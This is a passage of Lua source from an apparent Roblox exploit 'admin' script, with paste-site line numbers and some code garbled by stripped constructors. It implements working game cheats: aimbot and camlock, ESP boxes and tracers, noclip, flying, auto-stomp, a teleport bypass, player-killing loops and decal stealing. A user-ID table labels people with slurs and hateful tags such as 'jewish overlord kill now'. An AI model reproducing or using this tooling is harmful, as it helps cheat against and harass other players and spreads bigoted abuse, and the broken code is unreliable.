  1538. writefile("DecalLog From "..Player.Name.." "..math.random(1,99)..".txt","Stolen Decal: "..tostring(FindDecal.Decal.Texture:match"%d+").." From: "..Player.Name)
  1539. notif("Stole the Decal","From "..Player.Name.." check your exploits workspace folder",5,nil)
  1540. end
  1541. end
  1542. end
  1543. end,"decalsteal",{},"Steals a persons decal")
  1545. AddCommand(function()
  1546. AntiAfk = not AntiAfk
  1547. notif("Command: AntiAfk","has been set to "..tostring(AntiAfk),5,"rbxassetid://1281284684")
  1548. end,"antiafk",{},"Stops you from being kicked from \"AFK\"")
  1550. AddCommand(function(Arguments)
  1551. CamLocking = not CamLocking
  1552. if Arguments[1] then
  1553. local Player = PlrFinder(Arguments[1])
  1554. if Player then
  1555. CamlockPlayer = Player
  1556. end
  1557. end
  1558. end,"camlock",{"lockcam","cl"},"Different type of aimbot (Uses camera instead of the remote)")
  1560. local RainbowTable1,RainbowTable2;
  1561. AddCommand(function()
  1562. if game.PlaceId ~= 455366377 then notif("Wont work","you need to be on streets",5,nil) return end
  1563. RainbowHats = not RainbowHats
  1564. RainbowTable1,RainbowTable2 = LP.PlayerGui.HUD.Clan.Group.cs:GetChildren(),{}
  1565. local a = LP.PlayerGui.HUD.Clan.Group.Reps:GetChildren()
  1566. for i = 1,#a do
  1567. if a[i]:IsA'TextButton' then
  1568. RainbowTable2[#RainbowTable2 + 1] = a[i]
  1569. end
  1570. end
  1571. end,"rainbowhats",{},"complete autism lol")
  1573. AddCommand(function(Arguments)
  1574. if game.PlaceId == 455366377 then notif("Wont work","you need to be off streets",5,nil) return end
  1575. FeLoop = not FeLoop
  1576. if Arguments[1] and PlrFinder(Arguments[1]) then
  1577. LoopPlayer = PlrFinder(Arguments[1])
  1578. GetChar():BreakJoints()
  1579. else
  1580. LoopPlayer = nil
  1581. end
  1582. end,"feloop",{},"fe loops said player or turns it off")
  1584. AddCommand(function(Arguments)
  1585. if Arguments[1] then
  1586. if Arguments[1]:lower() == "leftclick" then
  1587. AimlockMode = "LeftClick"
  1588. updateSettings()
  1589. elseif Arguments[1]:lower() == "rightclick" then
  1590. AimlockMode = "RightClick"
  1591. updateSettings()
  1592. elseif Arguments[1]:lower() == "nomouse" then
  1593. AimlockMode = "NoMouse"
  1594. updateSettings()
  1595. else
  1596. notif("Not a mode","Either type leftclick,rightclick,nomouse")
  1597. end
  1598. end
  1599. end,"aimmode",{"aimlockmode"},"Sets aimmode [LeftClick/RightClick]")
  1601. AddCommand(function()
  1602. local Table = {}
  1603. for i = 1,10 do
  1604. local Server = HttpService:JSONDecode(game:HttpGet("""&startindex="..i)) -- OMG IP LOGGER IT DOES AN HTTP REQUEST - half of people on the streets lol
  1605. for i = 1,#Server.Collection do
  1606. Table[Server.Collection[i].Ping] = Server.Collection[i].Guid
  1607. end
  1608. end
  1609. for i,v in pairs(Table) do
  1610. if v ~= game.JobId then
  1611. TeleportService:TeleportToPlaceInstance(game.PlaceId,v)
  1612. break
  1613. end
  1614. end
  1615. end,"serverhop",{},"Server hopping capabilities")
  1618. local function Temp()
  1619. local Table = {}
  1620. for i,v in pairs(CmdFrame:GetChildren()) do
  1621. table.insert(Table,v.Text)
  1622. end
  1623. return Table
  1624. end
  1626. local WhitelistedOs = {
  1627. ['durango'] = "Xbox";
  1628. ['win32'] = "Windows";
  1629. ['ios'] = "Apple";
  1630. ['android'] = "Superior Android";
  1631. ['osx'] = "Mac (GROSS)";
  1632. ['windows_universal'] = "Windows 10 roblox"
  1633. }
  1634. UserInput.WindowFocusReleased:Connect(function()
  1635. RobloxInForeground = false
  1636. UserInput.WindowFocused:Wait()
  1637. RobloxInForeground = true
  1638. end)
  1640. local Debounce = false -- this code gets uglier every day holy fuck I'm gonna have to re-write it again soon lmao
  1641. local function Stepped()
  1642. if GodMode or FeLoop then
  1643. if LP.Character:FindFirstChild'Right Leg' then
  1644. LP.Character['Right Leg']:Destroy()
  1645. end
  1646. end
  1647. local PartFound = LP.Character:FindFirstChild'HumanoidRootPart' or LP.Character:FindFirstChild'Torso'
  1648. if Noclipping then
  1649. local CDescendant = LP.Character:GetDescendants()
  1650. for i = 1,#CDescendant do
  1651. if CDescendant[i]:IsA'Part' then
  1652. CDescendant[i].CanCollide = false
  1653. end
  1654. end
  1655. end
  1656. if flying and LP.Character:FindFirstChild'Humanoid' and not Debounce then
  1657. Debounce = true
  1658. LP.Character.Humanoid:ChangeState(3)
  1659. wait(0.2)
  1660. Debounce = false
  1661. end
  1662. if RainbowHats and LP.Backpack:FindFirstChild'Stank' then
  1663. LP.Backpack.Stank:FireServer("rep",RainbowTable2[math.random(1,#RainbowTable2)])
  1664. LP.Backpack.Stank:FireServer("color",RainbowTable1[math.random(1,#RainbowTable1)])
  1665. end
  1666. if TpBypass and LP.Character:FindFirstChild'RealHumanoidRootPart' then
  1667. LP.Character:FindFirstChild'RealHumanoidRootPart':Destroy()
  1668. end
  1669. if ClockTime then
  1670. Lighting.ClockTime = ClockTime
  1671. end
  1672. if FeLoop then
  1673. local BChild = LP.Backpack:GetChildren()
  1674. for i = 1,#BChild do
  1675. BChild[i].Parent = LP.Character
  1676. if game.PlaceId == 455366377 then
  1677. repeat wait() until not LP.Character:FindFirstChildOfClass'Tool'
  1678. end
  1679. end
  1680. if PartFound and LoopPlayer and LoopPlayer.Character and LoopPlayer.Character:FindFirstChild'Torso' then
  1681. PartFound.CFrame = LoopPlayer.Character.Torso.CFrame
  1682. end
  1683. end
  1684. if AutoStomp then
  1685. local Players = Players:GetPlayers()
  1686. for i = 1,#Players do
  1687. if Players[i] ~= LP and Players[i].Character and Players[i].Character:FindFirstChild'Head' and Players[i].Character:FindFirstChild'Torso' and not Players[i]:IsFriendsWith(LP.UserId) then
  1688. if (PartFound.Position - Players[i].Character.Torso.Position).magnitude < 50 and Players[i].Character:FindFirstChild'KO' and Players[i].Character.Humanoid.Health > 0 and not LP.Character:FindFirstChild'KO' and LP.Character.Humanoid.Health > 0 and not Players[i]:FindFirstChild'Dragged' and not table.find(DontStompWhitelisted,Players[i].UserId) then
  1689. PartFound.CFrame =[i].Character.Torso.Position)
  1690. LP.Backpack.ServerTraits.Finish:FireServer(LP.Backpack:FindFirstChild'Punch' or LP.Character:FindFirstChild'Punch')
  1691. end
  1692. end
  1693. end
  1694. end
  1695. if AirWalkOn and LP.Character:FindFirstChild'Humanoid' and PartFound then
  1696. LP.Character.Humanoid.HipHeight = 0
  1697. AirWalk.CFrame = PartFound.CFrame *,-3.5,0)
  1698. end
  1699. if CamLocking and CamlockPlayer and CamlockPlayer.Character and CamlockPlayer.Character:FindFirstChild'Torso' then
  1700. workspace.CurrentCamera.CoordinateFrame =,CamlockPlayer.Character.Head.CFrame.p)
  1701. end
  1702. for i = 1,#PlayerTable do
  1703. local Player,TopLeft,TopRight,BottomLeft,BottomRight = PlayerTable[i][1],PlayerTable[i][2],PlayerTable[i][3],PlayerTable[i][4],PlayerTable[i][5]
  1704. local Text,Tracer,IsUser = PlayerTable[i][6],PlayerTable[i][7],PlayerTable[i][8]
  1705. if Player and Player.Character and Player.Character:FindFirstChild'Head' and LP.Character and LP.Character:FindFirstChild'Head' then
  1706. local Part = Player.Character:FindFirstChild'HumanoidRootPart' or Player.Character:FindFirstChild'Torso'
  1707. if Part then
  1708. local Cframe = Part.CFrame
  1709. local h = Player.Character.Head.Size.Y / 2
  1710. local Size =,3,0) * (h * 2)
  1711. local RelativeHeadPos,TextOnScreen = workspace.CurrentCamera:WorldToViewportPoint(Player.Character.Head.Position)
  1712. local TopLeftPos = workspace.CurrentCamera:WorldToViewportPoint((Cframe *,Size.Y,0)).p)
  1713. local TopRightPos = workspace.CurrentCamera:WorldToViewportPoint((Cframe *,Size.Y,0)).p)
  1714. local BottomLeftPos = workspace.CurrentCamera:WorldToViewportPoint((Cframe *,-Size.Y,0)).p)
  1715. local BottomRightPos = workspace.CurrentCamera:WorldToViewportPoint((Cframe *,-Size.Y,0)).p)
  1716. if RobloxInForeground then
  1717. TopLeft.Visible = TextOnScreen
  1718. TopRight.Visible = TextOnScreen
  1719. BottomLeft.Visible = TextOnScreen
  1720. BottomRight.Visible = TextOnScreen
  1721. if DrawTable['Visible'] then
  1722. Tracer.Visible = TextOnScreen
  1723. else
  1724. Tracer.Visible = false
  1725. end
  1726. Text.Visible = TextOnScreen
  1727. else
  1728. TopLeft.Visible = false
  1729. TopRight.Visible = false
  1730. BottomLeft.Visible = false
  1731. BottomRight.Visible = false
  1732. Tracer.Visible = false
  1733. Text.Visible = false
  1734. end
  1735. if TextOnScreen and RobloxInForeground then
  1736. Text.Position =,RelativeHeadPos.Y) +,-30)
  1737. Text.Center = true
  1738. Text.Color = EspColour
  1739. Text.Text = Player.Name.." | Health: "..checkHp(Player.Character).." | Cy Admin User: "..IsUser.."\nHas: Glock "..hasItem(Player,"Glock").." | Shotty "..hasItem(Player,"Shotty").." | Vest "..hasItem(Player,"BulletResist")
  1740. TopLeft.From =,TopLeftPos.Y)
  1741. TopLeft.To =,TopRightPos.Y)
  1742. TopRight.From =,TopRightPos.Y)
  1743. TopRight.To =,BottomRightPos.Y)
  1744. BottomLeft.From =,BottomLeftPos.Y)
  1745. BottomLeft.To =,TopLeftPos.Y)
  1746. BottomRight.From =,BottomRightPos.Y)
  1747. BottomRight.To =,RelativeHeadPos.Y)
  1748. if tostring(Player) == tostring(AimlockTarget) or tostring(Player) == tostring(CamlockPlayer) then
  1749. Tracer.Color = Color3.fromRGB(144,0,0)
  1750. else
  1751. Tracer.Color = DrawTable['LineColour']
  1752. end
  1753. Tracer.Thickness = DrawTable['Thickness']
  1754. Tracer.Transparency = DrawTable['Transparency']
  1755. Tracer.From = / 2,workspace.CurrentCamera.ViewportSize.X / 2 + 400)
  1756. Tracer.To =,RelativeHeadPos.Y)
  1757. end
  1758. end
  1759. end
  1760. end
  1761. end
  1763. local function CChildAdded(Thing)
  1764. if Thing.Name == "KO" and AutoDie then
  1765. GetChar():BreakJoints()
  1766. end
  1767. end
  1769. Cframe.BackgroundColor3 =,0,0)
  1770. Cframe.BackgroundTransparency = 0.20000000298023
  1771. Cframe.BorderSizePixel = 0
  1772. Cframe.Position =, 0, 1, 0)
  1773. Cframe.Size =, 270, 0, 35)
  1775. CText.BackgroundColor3 =,0.000738177,0.000738177)
  1776. CText.BorderSizePixel = 0
  1777. CText.Position =, 5, 0, 5)
  1778. CText.Size =, 260, 0, 25)
  1779. CText.Font = Enum.Font.SourceSansLight
  1780. CText.Text = ""
  1781. CText.TextColor3 =, 1, 1)
  1782. CText.TextScaled = true
  1783. CText.TextSize = 14
  1784. CText.TextWrapped = true
  1786. CmdFrame.BackgroundColor3 =, 0.000738177, 0.000738177)
  1787. CmdFrame.BorderSizePixel = 0
  1788. CmdFrame.Position =, 0, -4, 0)
  1789. CmdFrame.Size =, 0, 4, 0)
  1790. CmdFrame.Visible = false
  1792. local function Create(Text)
  1793. if not Text then return end
  1794. local CmdList ="TextLabel",CmdFrame)
  1795. CmdList.BackgroundColor3 =, 0, 0)
  1796. CmdList.BackgroundTransparency = 0.20000000298023
  1797. CmdList.BorderSizePixel = 0
  1798. CmdList.Position =, 0, 0, 0)
  1799. CmdList.Size =, 0, 0, 20)
  1800. CmdList.Font = Enum.Font.SourceSansLight
  1801. CmdList.Text = Text
  1802. CmdList.TextColor3 =, 0.952941, 0.952941)
  1803. CmdList.TextScaled = true
  1804. CmdList.TextWrapped = true
  1805. end
  1807. local function Changed()
  1808. pcall(function()
  1809. if CText.Text ~= "" then
  1810. CmdFrame.Visible = true
  1811. local PositionMatch = 0
  1812. for _,cmd in pairs(CmdFrame:GetChildren()) do
  1813. if string.find(string.lower(cmd.Text),string.lower(CText.Text)) then
  1814. cmd.Position =, 0, 0, 2 + (PositionMatch * 20))
  1815. PositionMatch = PositionMatch + 1
  1816. if cmd.Position ==, 0, 0, 142) then
  1817. cmd.Position =, 0, 0, 0)
  1818. PositionMatch = PositionMatch - 1
  1819. end
  1820. else
  1821. cmd.Position =, 0, 0, 0)
  1822. end
  1823. end
  1824. else
  1825. CmdFrame.Visible = false
  1826. end
  1827. end)
  1828. end
  1830. MainFrame.BackgroundColor3 = Color3.fromRGB(0,0,0)
  1831. MainFrame.BackgroundTransparency = 0.250
  1832. MainFrame.BorderColor3 = Color3.fromRGB(53,2,2)
  1833. MainFrame.BorderSizePixel = 8
  1834. MainFrame.Position =,695,0,297)
  1835. MainFrame.Size =,495,0,431)
  1836. MainFrame.AnchorPoint =,0)
  1837. MainFrame.Visible = false
  1838. MainFrame.Active = true
  1839. MainFrame.Draggable = true
  1841. ScrollingFrame.BackgroundColor3 = Color3.fromRGB(53,2,2)
  1842. ScrollingFrame.BackgroundTransparency = 0.400
  1843. ScrollingFrame.BorderColor3 = Color3.fromRGB(0,0,0)
  1844. ScrollingFrame.BorderSizePixel = 5
  1845. ScrollingFrame.Position =,0,0.126374945,0)
  1846. ScrollingFrame.Size =,411,0,348)
  1848. SearchBar.BackgroundColor3 = Color3.fromRGB(53,2,2)
  1849. SearchBar.BackgroundTransparency = 0.400
  1850. SearchBar.BorderColor3 = Color3.fromRGB(0,0,0)
  1851. SearchBar.BorderSizePixel = 5
  1852. SearchBar.Position =,0,0.0598471165,0)
  1853. SearchBar.Size =,411,0,28)
  1854. SearchBar.Font = Enum.Font.SourceSansBold
  1855. SearchBar.PlaceholderColor3 = Color3.fromRGB(255,255,255)
  1856. SearchBar.Text = "Search"
  1857. SearchBar.TextColor3 = Color3.fromRGB(135, 135, 135)
  1858. SearchBar.TextSize = 24.000
  1860. Credits.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  1861. Credits.BackgroundTransparency = 0.250
  1862. Credits.BorderColor3 = Color3.fromRGB(53, 2, 2)
  1863. Credits.BorderSizePixel = 5
  1864. Credits.Position =,0,0.948468387,0)
  1865. Credits.Size =,187,0,22)
  1866. Credits.Font = Enum.Font.SourceSansBold
  1867. Credits.Text = "UI Design by !fishgang Karma#9669"
  1868. Credits.TextColor3 = Color3.fromRGB(255,255,255)
  1869. Credits.TextSize = 14.000
  1871. DmgIndicator.BackgroundColor3 = Color3.fromRGB(0,0,0)
  1872. DmgIndicator.BackgroundTransparency = 0.700
  1873. DmgIndicator.BorderSizePixel = 3
  1874. DmgIndicator.Position =,0,1.00488257,0)
  1875. DmgIndicator.Size =,385,0,50)
  1876. DmgIndicator.Font = Enum.Font.SourceSans
  1877. DmgIndicator.Text = ''
  1878. DmgIndicator.TextColor3 = Color3.fromRGB(184,0,3)
  1879. DmgIndicator.TextScaled = true
  1880. DmgIndicator.TextSize = 30.000
  1881. DmgIndicator.TextWrapped = true
  1882. DmgIndicator.Visible = false
  1884. local function CreateCommand(Pos,Text)
  1885. local ActualCommands ='TextLabel',ScrollingFrame)
  1886. ActualCommands.BackgroundColor3 = Color3.fromRGB(26, 26, 26)
  1887. ActualCommands.BackgroundTransparency = 0.200
  1888. ActualCommands.BorderColor3 = Color3.fromRGB(53, 2, 2)
  1889. ActualCommands.Position = Pos
  1890. ActualCommands.Size =, 382, 0, 20)
  1891. ActualCommands.Font = Enum.Font.SourceSansBold
  1892. ActualCommands.Text = Text
  1893. ActualCommands.TextColor3 = Color3.fromRGB(255, 255, 255)
  1894. ActualCommands.TextSize = 14.000
  1895. ActualCommands.TextScaled = true
  1896. ActualCommands.TextWrapped = true
  1897. end
  1899. SearchBar.Changed:Connect(function()
  1900. local Index = 0
  1901. if SearchBar.Text then
  1902. for _,v in pairs(ScrollingFrame:GetChildren()) do
  1903. if not string.find(v.Text:lower(),SearchBar.Text:lower()) then
  1904. v.Visible = false
  1905. else
  1906. v.Visible = true
  1907. Index = Index + 1
  1908. v.Position =,0,0.0127776451,0 + (Index * 20))
  1909. end
  1910. end
  1911. end
  1912. end)
  1914. local CoolkidTable = {
  1915. ['714877'] = {
  1916. ['Name'] = "!fishgang Ambiguity";
  1917. ['Colour'] = Color3.fromRGB(57,52,52);
  1918. ['Access'] = true;
  1919. };
  1920. ['96316322'] = {
  1921. ['Name'] = "!fishgang Ambiguity";
  1922. ['Colour'] = Color3.fromRGB(57,52,52);
  1923. ['Access'] = true;
  1924. };
  1925. ['363215082'] = {
  1926. ['Name'] = "Lynx GUN$OWW";
  1927. ['Colour'] = Color3.fromRGB(150,0,250);
  1928. ['Access'] = true;
  1929. };
  1930. ['114164798'] = {
  1931. ['Name'] = "!fishgang Slays";
  1932. ['Colour'] = Color3.fromRGB(0,255,255);
  1933. ['Access'] = true;
  1934. };
  1935. ['836005431'] = {
  1936. ['Name'] = "!fishgang Slays";
  1937. ['Colour'] = Color3.fromRGB(0,255,255);
  1938. ['Access'] = true;
  1939. };
  1940. ['779000075'] = {
  1941. ['Name'] = "Ning";
  1942. ['Colour'] = Color3.fromRGB(138,3,3);
  1943. ['Access'] = true;
  1944. };
  1945. ['330613117'] = {
  1946. ['Name'] = "Ning";
  1947. ['Colour'] = Color3.fromRGB(138,3,3);
  1948. ['Access'] = true;
  1949. };
  1950. ['659119329'] = {
  1951. ['Name'] = "!fishgang Co-owner Cy | Creator of Cyrus' Streets Admin";
  1952. ['Colour'] = Color3.fromRGB(212,224,255);
  1953. ['Access'] = true;
  1954. };
  1955. ['659119329'] = {
  1956. ['Name'] = "!fishgang Co-owner Cy Alt | Creator of Cyrus' Streets Admin";
  1957. ['Colour'] = Color3.fromRGB(212,224,255);
  1958. ['Access'] = true;
  1959. };
  1960. ['1388703832'] = {
  1961. ['Name'] = "!fishgang Co-owner Cy Main | Creator of Cyrus' Streets Admin";
  1962. ['Colour'] = Color3.fromRGB(212,224,255);
  1963. ['Access'] = true;
  1964. };
  1965. ['62009114'] = {
  1966. ['Name'] = "!fishgang Owner X_D6";
  1967. ['Colour'] = Color3.fromRGB(176,16,16);
  1968. ['Access'] = true;
  1969. };
  1970. ['57370993'] = {
  1971. ['Name'] = "!fishgang Karma";
  1972. ['Colour'] = Color3.fromRGB(255,0,0);
  1973. ['Access'] = true;
  1974. };
  1975. ['20220183'] = {
  1976. ['Name'] = "!fishgang Wya";
  1977. ['Colour'] = Color3.fromRGB(215,19,19);
  1978. ['Access'] = true;
  1979. };
  1980. ['1477162063'] = {
  1981. ['Name'] = "!fishgang Wya (YFRWK)";
  1982. ['Colour'] = Color3.fromRGB(192,6,6);
  1983. ['Access'] = true;
  1984. };
  1985. ['105183043'] = {
  1986. ['Name'] = "Drpoppadopolist | Drpoppa Creator";
  1987. ['Colour'] = Color3.fromRGB(107,50,124);
  1988. ['Access'] = true;
  1989. };
  1990. ['1190936'] = {
  1991. ['Name'] = "trippinfo";
  1992. ['Colour'] = Color3.fromRGB(12,4,134);
  1993. ['Access'] = true;
  1994. };
  1995. ['378666469'] = {
  1996. ['Name'] = "trippinfo";
  1997. ['Colour'] = Color3.fromRGB(12,4,134);
  1998. ['Access'] = true;
  1999. };
  2000. ['548617338'] = {
  2001. ['Name'] = "Cool Person";
  2002. ['Colour'] = Color3.fromRGB(36,89,237);
  2003. ['Access'] = false;
  2004. };
  2005. ['1275692258'] = {
  2006. ['Name'] = "Big Dick (Vegan/Syntrix Creator who also paid me to put this)";
  2007. ['Colour'] = Color3.fromRGB(125,0,0);
  2008. ['Access'] = true;
  2009. };
  2010. ['612618136'] = {
  2011. ['Name'] = "Bird (Donator)";
  2012. ['Colour'] = Color3.fromRGB(125,0,0);
  2013. ['Access'] = false;
  2014. };
  2015. ['284761493'] = {
  2016. ['Name'] = "[Strafe] XVE |";
  2017. ['Colour'] = Color3.fromRGB(102,0,0);
  2018. ['Access'] = true;
  2019. };
  2020. ['178560'] = {
  2021. ['Name'] = "Literally a fucking egg.";
  2022. ['Colour'] = Color3.fromRGB(255,248,11);
  2023. ['Access'] = false;
  2024. };
  2025. ['120476167'] = {
  2026. ['Name'] = "Pawels Owner";
  2027. ['Colour'] = Color3.fromRGB(52,152,219);
  2028. ['Access'] = false;
  2029. };
  2030. ['120476167'] = {
  2031. ['Name'] = "Pawels Owner";
  2032. ['Colour'] = Color3.fromRGB(52,152,219);
  2033. ['Access'] = false;
  2034. };
  2035. ['418171482'] = {
  2036. ['Name'] = "Woman beater";
  2037. ['Colour'] = Color3.fromRGB(255,0,70);
  2038. ['Access'] = false;
  2039. };
  2040. ['710288902'] = {
  2041. ['Name'] = "autistic kid who bought the shirt twice and is active in the server";
  2042. ['Colour'] = Color3.fromRGB(0,255,0);
  2043. ['Access'] = false;
  2044. };
  2045. ['383632734'] = {
  2046. ['Name'] = "Dot_Mp4 phonk phonk rattle rattle supplier";
  2047. ['Colour'] = Color3.fromRGB(255,0,0);
  2048. ['Access'] = true;
  2049. };
  2050. ['1066524308'] = {
  2051. ['Name'] = "Kylee (kill her and get blacklisted)";
  2052. ['Colour'] = Color3.fromRGB(178,242,255);
  2053. ['Access'] = true;
  2054. };
  2055. ['39939779'] = {
  2056. ['Name'] = "jewish overlord kill now";
  2057. ['Colour'] = Color3.fromRGB(0,1,0);
  2058. ['Access'] = true;
  2059. };
  2060. ['1404681381'] = {
  2061. ['Name'] = "Monkey Killer";
  2062. ['Colour'] = Color3.fromRGB(255,0,0);
  2063. ['Access'] = true;
  2064. };
  2065. ['1528488185'] = {
  2066. ['Name'] = "!fishgang Chronic\nkill = retarded";
  2067. ['Colour'] = Color3.fromRGB(235,31,31);
  2068. ['Access'] = true;
  2069. };
  2070. }
  2071. local Debounce = false
  2072. local function ColourChanger(T)
  2073. if T:IsA'Trail' and not CoolkidTable[tostring(LP.UserId)] then
  2074. T.Color = BulletColour
  2075. end
  2076. if T:IsA'ObjectValue' and T.Name == "creator" and not Debounce then
  2077. local Thing = T.Value
  2078. local Method,Tool = Char(Thing)
  2079. b(Thing.Name.." has "..Method.." from "..math.floor((GetChar().Head.Position - Thing.Head.Position).magnitude).." studs with a "..Tool.Name)
  2080. if Tool.Name == "Shotty" then
  2081. Debounce = true
  2082. wait(0.7)
  2083. Debounce = false
  2084. end
  2085. end
  2086. end
  2088. local function HealthChanged(Health)
  2089. if Health <= HealBotHealth and HealBot and not TpBypass then
  2090. if GrabThing("Burger",GetChar().Head.CFrame) then
  2091. local Hamborger = LP.Backpack:FindFirstChild'Burger'
  2092. if Hamborger then
  2093. Hamborger.Parent = GetChar()
  2094. Hamborger:Activate() -- CHEEMS
  2095. repeat RunService.Heartbeat:Wait() until Hamborger.Parent ~= LP.Character
  2096. end
  2097. end -- yeah I copy pasted it from my heal cmd DEAL WITH IT
  2098. if GrabThing("Drink",GetChar().Head.CFrame) then
  2099. local Drink = LP.Backpack:FindFirstChild'Drink'
  2100. if Drink then
  2101. Drink.Parent = GetChar()
  2102. Drink:Activate()
  2103. end
  2104. end
  2105. end
  2106. end
  2108. LP.CharacterAdded:Connect(function()
  2109. GetChar():WaitForChild('Humanoid',10)
  2110. ChildAddedEvent = GetChar().ChildAdded:Connect(CChildAdded)
  2111. HumanoidStateChangedEvent = GetChar().Humanoid.StateChanged:Connect(HumanoidState)
  2112. HumanoidCAdded = GetChar().Humanoid.DescendantAdded:Connect(ColourChanger)
  2113. HumanoidHealthChanged = GetChar().Humanoid.HealthChanged:Connect(HealthChanged)
  2114. GetChar().Humanoid.WalkSpeed = SpawnWS or NormalWS
  2115. GetChar().Humanoid.JumpPower = SpawnJP or NormalJP
  2116. GetChar().Humanoid.HipHeight = SpawnHH or NormalHH
  2117. if FeLoop then
  2118. local Humanoid = GetChar().Humanoid:Clone()
  2119. GetChar().Humanoid:Destroy()
  2120. Humanoid.Parent = GetChar()
  2121. workspace.CurrentCamera.CameraSubject = GetChar()
  2122. end
  2123. if PlayOnDeath then
  2124. wait()
  2125. local Tool = LP.Backpack:WaitForChild('BoomBox')
  2126. if Tool then
  2127. Tool.Parent = GetChar()
  2128. wait()
  2129. Tool:FindFirstChildOfClass'RemoteEvent':FireServer("play",PlayOnDeath)
  2130. Tool.Parent = LP.Backpack
  2131. end
  2132. end
  2133. end)
  2135. LP.CharacterRemoving:Connect(function()
  2136. ChildAddedEvent:Disconnect()
  2137. HumanoidStateChangedEvent:Disconnect()
  2138. HumanoidCAdded:Disconnect()
  2139. HumanoidHealthChanged:Disconnect()
  2140. HR = nil
  2141. flying = false
  2142. end)
  2144. UserInput.InputBegan:Connect(function(Key)
  2145. if UserInput:GetFocusedTextBox() then return end
  2146. local PartFound = GetChar():FindFirstChild'HumanoidRootPart' or GetChar():FindFirstChild'Torso'
  2147. if Key.KeyCode == Enum.KeyCode.LeftControl then
  2148. if AirWalkOn then
  2149. AirWalk.Size =,-1,0)
  2150. end
  2151. if Normalwalk and ControlSpeed == 8 then return end
  2152. GetChar().Humanoid.WalkSpeed = ControlSpeed
  2153. end
  2154. if Key.KeyCode == Enum.KeyCode.LeftShift then
  2155. KeyTable['Shift'] = true
  2156. if Normalwalk and ShiftSpeed == 25 then return end
  2157. GetChar().Humanoid.WalkSpeed = ShiftSpeed
  2158. end
  2159. if Key.KeyCode == Enum.KeyCode.W then
  2160. KeyTable['w'] = true
  2161. end
  2162. if Key.KeyCode == Enum.KeyCode.A then
  2163. KeyTable['a'] = true
  2164. end
  2165. if Key.KeyCode == Enum.KeyCode.S then
  2166. KeyTable['s'] = true
  2167. end
  2168. if Key.KeyCode == Enum.KeyCode.D then
  2169. KeyTable['d'] = true
  2170. end
  2171. if Key.KeyCode == Enum.KeyCode.E and GetChar():FindFirstChildOfClass'Tool' and not GetChar():FindFirstChild'KO' then
  2172. LP.Backpack.ServerTraits.Finish:FireServer(LP.Backpack.Punch)
  2173. end
  2174. if Key.KeyCode == Enum.KeyCode.Space and AirWalkOn then
  2175. PartFound.CFrame = PartFound.CFrame +,5,0)
  2176. end
  2177. if Key.KeyCode == Enum.KeyCode.Quote then
  2178. CText:CaptureFocus()
  2179. Cframe:TweenPosition(,0,0.95,0),"Out","Elastic",0.5,true)
  2180. wait()
  2181. CText.Text = ""
  2182. UserInput.TextBoxFocusReleased:Wait()
  2183. local Command = CText.Text
  2184. CText.Text = ""
  2185. CheckCommand(Command)
  2186. Cframe:TweenPosition(,0,1,0),"Out","Quad",0.5,true)
  2187. end
  2188. if ClickTpKey and ClickTpKey ~= "" and Key.KeyCode == Enum.KeyCode[ClickTpKey:upper()] and Mouse.Target then
  2189. if (Mouse.Hit.Position - PartFound.Position).magnitude < 50 then
  2190. PartFound.CFrame = +,5,0))
  2191. else
  2192. Teleport( +,5,0)))
  2193. end
  2194. end
  2195. if Keys then
  2196. for _,v in pairs(Keys) do
  2197. if v and Enum.KeyCode[v:match'[%a%d]+$':upper()] == Key.KeyCode then
  2198. CheckCommand(v:match'^[%w%s]+')
  2199. end
  2200. end
  2201. end
  2202. end)
  2204. UserInput.InputEnded:Connect(function(Key)
  2205. if UserInput:GetFocusedTextBox() then return end
  2206. if Key.KeyCode == Enum.KeyCode.LeftControl then
  2207. if AirWalkOn then
  2208. AirWalk.Size =,1,5)
  2209. end
  2210. if Normalwalk and ControlSpeed == 8 then return end
  2211. GetChar().Humanoid.WalkSpeed = WalkSpeed
  2212. end
  2213. if Key.KeyCode == Enum.KeyCode.W then
  2214. KeyTable['w'] = false
  2215. end
  2216. if Key.KeyCode == Enum.KeyCode.A then
  2217. KeyTable['a'] = false
  2218. end
  2219. if Key.KeyCode == Enum.KeyCode.S then
  2220. KeyTable['s'] = false
  2221. end
  2222. if Key.KeyCode == Enum.KeyCode.D then
  2223. KeyTable['d'] = false
  2224. end
  2225. if Key.KeyCode == Enum.KeyCode.LeftShift and ShiftSpeed then
  2226. KeyTable['Shift'] = false
  2227. if Normalwalk and ShiftSpeed == 25 then return end
  2228. GetChar().Humanoid.WalkSpeed = WalkSpeed
  2229. end
  2230. end)
  2232. Players.PlayerRemoving:Connect(function(P)
  2233. Unesp(P)
  2234. end)
  2236. CText.FocusLost:Connect(function(Enter)
  2237. Cframe:TweenPosition(, 0, 1, 0),"Out","Quad",0.5,true)
  2238. if Enter then
  2239. local Command = CText.Text
  2240. CText.Text = ""
  2241. CheckCommand(Command)
  2242. end
  2243. end)
  2245. AddCommand(function(Arguments)
  2246. if Arguments[1] then
  2247. local File = loadfile("CyAdminPlugins\\"..Arguments[1])
  2248. if not File then
  2249. ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Syntax Error (Can't output it since loadfile gay)","All")
  2250. return
  2251. else
  2252. local W,E = pcall(File)
  2253. if not W then
  2254. ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Runtime Error"..E,"All")
  2255. return
  2256. end
  2257. end
  2258. local T = Temp()
  2259. for i = 1,#Commands do
  2260. if not table.find(T,Commands[i].Name) then
  2261. Create(Commands[i].Name)
  2262. CreateCommand(,0,0.0127776451,0 + (i * 20)),Commands[i].Name.." "..Commands[i].Help)
  2263. end
  2264. end
  2265. end
  2266. end,"runplugin",{},"Loads plugins (no it doesn't refresh them so don't be retarded")
  2269. ChildAddedEvent = GetChar().ChildAdded:Connect(CChildAdded)
  2270. HumanoidStateChangedEvent = GetChar().Humanoid.StateChanged:Connect(HumanoidState)
  2271. HumanoidCAdded = GetChar().Humanoid.DescendantAdded:Connect(ColourChanger)
  2272. HumanoidHealthChanged = GetChar().Humanoid.HealthChanged:Connect(HealthChanged)
  2273. Mouse.Button1Down:Connect(Button1Down)
  2274. Mouse.Button2Down:Connect(Button2Down)
  2275. LP.Chatted:Connect(CheckCommand)
  2276. UserInput.JumpRequest:Connect(DoubleJump)
  2277. CText:GetPropertyChangedSignal("Text"):Connect(Changed)
  2278. RunService.Stepped:Connect(Stepped)
  2280. spawn(function()
  2281. while true do
  2282. local Char = GetChar()
  2283. if Char then
  2284. local PartFound = Char:FindFirstChild'HumanoidRootPart' or Char:FindFirstChild'Torso'
  2285. if Char:FindFirstChildOfClass'Humanoid' and UseDraw then
